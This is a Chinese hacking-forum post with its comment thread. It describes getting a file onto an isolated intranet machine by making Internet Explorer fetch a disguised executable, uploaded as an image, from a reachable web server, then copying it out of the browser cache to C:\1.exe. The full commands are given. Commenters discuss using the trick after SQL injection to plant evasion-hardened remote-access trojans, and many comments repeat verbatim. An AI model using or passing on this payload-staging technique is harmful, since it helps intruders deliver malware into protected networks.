一个奇葩的内网写入文件方法
引用90sec探讨的问题
找到一个可以上传图片的web站点。
"C:\Program Files\Internet Explorer\iexplore.exe" http://内网可以访问的站点/0/09/40/75/91ef76c6a7efce1bee5deaebac51f3deb48f6598.jpg
然后 cd 到C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files>
执行dir /s /w 91ef76c6a7efce1bee5deaebac51f3deb48f6598*.* 找到路径
type 路径>C:\1.exe 应该可以突破他内网了。
评论70次
嗯,有shell的情况下vbs就是麻烦些,这方法不错,还可以用ftp脚本
不错,内网一般都是免杀远控,2008的试试poeweshell
哈哈我比较菜
环境是一个dbserver cmd权限 加一个存在上传的、db可访问的 webserver , dbserver不连外网,需要db 拿到权限, 通过访问webserver的图片生成在缓存然后可以改后缀执行程序。 但是笔者的环境中db不连外网,执行木马的话又不能直接外连,请问有啥用???
嗯,有shell的情况下vbs就是麻烦些,这方法不错,还可以用ftp脚本
不错,内网一般都是免杀远控,2008的试试poeweshell
我觉得这个可以适用于在能执行少部分cmd代码的情况下使用,感觉有一点像和上传vbs那样,代码传上去再改后缀
就一个技巧。什么时候用到就拿出来哈哈
能执行命令的话 这里已经完成了80% 至少,其余无非就是复杂与不复杂 麻烦与不麻烦的问题。这个要对外访问 利用IE写缓存然后读取再写入 也算一个思路 只要能对外一切没问题
你们没看配图哈哈!我说的是一种情况下。例如是一个http://www.baidu.com/index.PHP?id=1 這个是注入他的站酷分离。内网无法访问外网。但是猜测应该他可以访问 他這个站点对吧。假设可以访问這个站点,就找到一个可以上传图片的地方上传到一个图片。然后就有这玩意
原来是做跳板 内网对内网访问
哈哈,可能是我表达能力不行。说的基本没人看明白
我觉得这个可以适用于在能执行少部分cmd代码的情况下使用,感觉有一点像和上传vbs那样,代码传上去再改后缀
能执行命令的话 这里已经完成了80% 至少,其余无非就是复杂与不复杂 麻烦与不麻烦的问题。这个要对外访问 利用IE写缓存然后读取再写入 也算一个思路 只要能对外一切没问题
你们没看配图哈哈!我说的是一种情况下。例如是一个http://www.baidu.com/index.PHP?id=1 這个是注入他的站酷分离。内网无法访问外网。但是猜测应该他可以访问 他這个站点对吧。假设可以访问這个站点,就找到一个可以上传图片的地方上传到一个图片。然后就有这玩意
原来是做跳板 内网对内网访问
能执行命令的话 这里已经完成了80% 至少,其余无非就是复杂与不复杂 麻烦与不麻烦的问题。这个要对外访问 利用IE写缓存然后读取再写入 也算一个思路 只要能对外一切没问题
你们没看配图哈哈!我说的是一种情况下。例如是一个http://www.baidu.com/index.PHP?id=1 這个是注入 他的站酷分离。内网无法访问外网。但是猜测应该他可以访问 他這个站点对吧。 假设可以访问這个站点,就找到一个可以上传图片的地方上传到一个图片。然后就有这玩意
膜拜大牛
能执行命令的话 这里已经完成了80% 至少,其余无非就是复杂与不复杂 麻烦与不麻烦的问题。 这个要对外访问 利用IE写缓存然后读取再写入 也算一个思路 只要能对外一切没问题
都能执行命令 这个用处不大了 只能算个技巧 ,而且严格的内网一般不具备外网权限
虽然不懂内网渗透,但是感觉66的。 要是如果有个小教程就更好了。
看半天没看懂,看了评论才懂,对于奇葩环境来说值得一试,平时都是powershell或者vbs
我也感觉我的语言表达能力不行。
为啥用type 不用直接用ren
dos命令我知道的比较少
看半天没看懂,看了评论才懂,对于奇葩环境来说值得一试,平时都是powershell或者vbs
为啥用type 不用直接用ren
这个是什么方式 没看明白
实践一下就知道了就是利用ie去生成个缓存
谢谢了~ 6~7年不玩黑了 只是有时间来看看~
这个是什么方式 没看明白
实践一下就知道了就是利用ie去生成个缓存
谢谢了~ 6~7年不玩黑了 只是有时间来看看~